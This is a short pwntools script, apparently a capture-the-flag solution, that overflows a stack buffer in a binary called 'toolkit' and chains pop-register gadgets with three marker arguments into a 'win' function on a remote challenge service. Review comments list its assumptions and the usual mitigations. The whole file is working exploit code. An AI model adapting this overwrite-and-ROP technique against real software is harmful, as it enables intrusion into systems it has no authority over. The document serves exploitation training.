"""Return-address overwrite against ./toolkit that redirects execution to `win`.

The script sends OFFSET filler bytes followed by a short chain of
hard-coded code addresses, then hands the connection to the operator.

NOTE(review): every address below is an absolute 0x40xxxx value, so the
chain only holds if the binary loads at a fixed base (presumably built
without PIE) and the overwrite is not caught by a stack canary. Confirm
with checksec, whose report is suppressed here by checksec=False. On the
defensive side, the usual mitigations are a bounded read into the buffer,
-fstack-protector, and PIE with ASLR.
"""
from pwn import *

# Filler bytes sent before the first chain word.
# NOTE(review): presumably buffer + saved frame pointer; verify against the binary.
OFFSET = 64

elf = ELF("./toolkit", checksec=False)
context.binary = elf

# Local run instead of the remote service:
# io = process(elf.path)
io = remote("offsec.m0lecon.it", 13554)

# Marker values loaded into rdi, rsi and rdx before `win` is reached.
# NOTE(review): presumably the three arguments `win` checks; confirm in the disassembly.
ARG1 = 0x1111111111111111
ARG2 = 0x2222222222222222
ARG3 = 0x3333333333333333

# Addresses inside the binary. The names suggest `pop <reg>; ret` gadgets and a
# bare `ret`; the instructions themselves are not visible from this script.
POP_RDI = 0x00000000004011FF
POP_RDX = 0x0000000000401211
POP_RSI = 0x0000000000401208
RET = 0x000000000040101A
WIN = 0x000000000040121E

banner = io.recvuntil(b"[toolkit] Input: ")
print(banner)

# Chain order: a bare `ret` first (presumably to keep the stack 16-byte aligned
# when `win` runs), then one gadget/value pair per argument register, then the
# target function.
chain = [
    RET,
    POP_RDI, ARG1,
    POP_RSI, ARG2,
    POP_RDX, ARG3,
    WIN,
]
payload = b"A" * OFFSET + b"".join(p64(word) for word in chain)

# Payload and terminating newline go out as two separate writes.
io.send(payload)
io.send(b"\n")
io.interactive()